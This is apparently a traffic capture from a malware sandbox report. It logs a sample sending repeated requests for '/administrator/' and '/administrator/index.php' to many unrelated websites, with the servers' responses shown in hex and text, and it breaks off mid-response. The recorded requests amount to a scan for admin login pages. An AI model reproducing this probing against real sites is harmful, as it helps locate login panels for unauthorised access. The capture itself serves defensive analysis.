                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                location: http://conceptualintegration.com
                                                                                                                                                                                                                                                                                                                x-litespeed-cache: miss
                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                vary: User-Agent


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                67192.168.2.653160172.67.204.2980
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.390769958 CET230OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.906531096 CET859INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://khodyari.com/administrator/
                                                                                                                                                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I4R%2B2Gli1foNXEAeV3Bah%2FQxQKXKBrekWxpbuuvIo8lXugiOaVR4rIpvTFmz2Onb9ts2h%2F8Sm3y6D2qVvZPvtt1heSITqc9SMpL6itFB7%2BGTKjAELt2g41rUr9Pkey8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                CF-RAY: 82efaf383f49829c-IAD
                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                Data Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.906574965 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.567609072 CET239OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.397625923 CET868INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://khodyari.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bUItJYk2hX2ZZb5j3h9smkhM87wFV9a%2Fsk9AT9rVmDC1FRlw%2BsOFwhAw%2FAg6Ce6KT2EkuX6oCIMoDVQTCbwCYZtc2iB0pheY33Caq0t%2FvHl34a1Gs6zMNRhuQm4r5es%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                CF-RAY: 82efaf589cca829c-IAD
                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                Data Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.397640944 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                68192.168.2.65316464.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.391164064 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.528238058 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.756980896 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://mcsmk8.com/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.893263102 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                69192.168.2.65316964.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.391464949 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.560890913 CET795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 559
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Allow: GET,HEAD
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 45 42 53 49 54 45 2e 57 53 20 2d 20 59 6f 75 72 20 49 6e 74 65 72 6e 65 74 20 41 64 64 72 65 73 73 20 46 6f 72 20 4c 69 66 65 26 74 72 61 64 65 3b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 09 3c 6e 6f 66 72 61 6d 65 73 3e 0a 09 09 3c 70 3e 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 66 72 61 6d 65 73 2e 20 43 6f 6e 74 69 6e 75 65 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>WEBSITE.WS - Your Internet Address For Life&trade;</title><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><frameset rows="100%,*" border="0" frameborder="0"><frame src="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws" scrolling="auto" frameborder="0" /><noframes><p> Your browser does not support frames. Continue to <a href="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws">https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws</a>.</p></noframes></frameset></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.756980896 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://fedyanin.ws/administrator/


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                70192.168.2.65316764.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.391858101 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.569288015 CET795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 559
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Allow: GET,HEAD
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 45 42 53 49 54 45 2e 57 53 20 2d 20 59 6f 75 72 20 49 6e 74 65 72 6e 65 74 20 41 64 64 72 65 73 73 20 46 6f 72 20 4c 69 66 65 26 74 72 61 64 65 3b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 09 3c 6e 6f 66 72 61 6d 65 73 3e 0a 09 09 3c 70 3e 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 66 72 61 6d 65 73 2e 20 43 6f 6e 74 69 6e 75 65 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 73 69 74 65 2e 77 73 2f 77 63 5f 6c 61 6e 64 69 6e 67 2e 64 68 74 6d 6c 3f 64 6f 6d 61 69 6e 3d 66 65 64 79 61 6e 69 6e 2e 77 73 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>WEBSITE.WS - Your Internet Address For Life&trade;</title><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><frameset rows="100%,*" border="0" frameborder="0"><frame src="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws" scrolling="auto" frameborder="0" /><noframes><p> Your browser does not support frames. Continue to <a href="https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws">https://www.website.ws/wc_landing.dhtml?domain=fedyanin.ws</a>.</p></noframes></frameset></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.757026911 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://fedyanin.ws/administrator/


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                71192.168.2.6531743.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.392890930 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                72192.168.2.653161188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.393115997 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.610270023 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:24 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
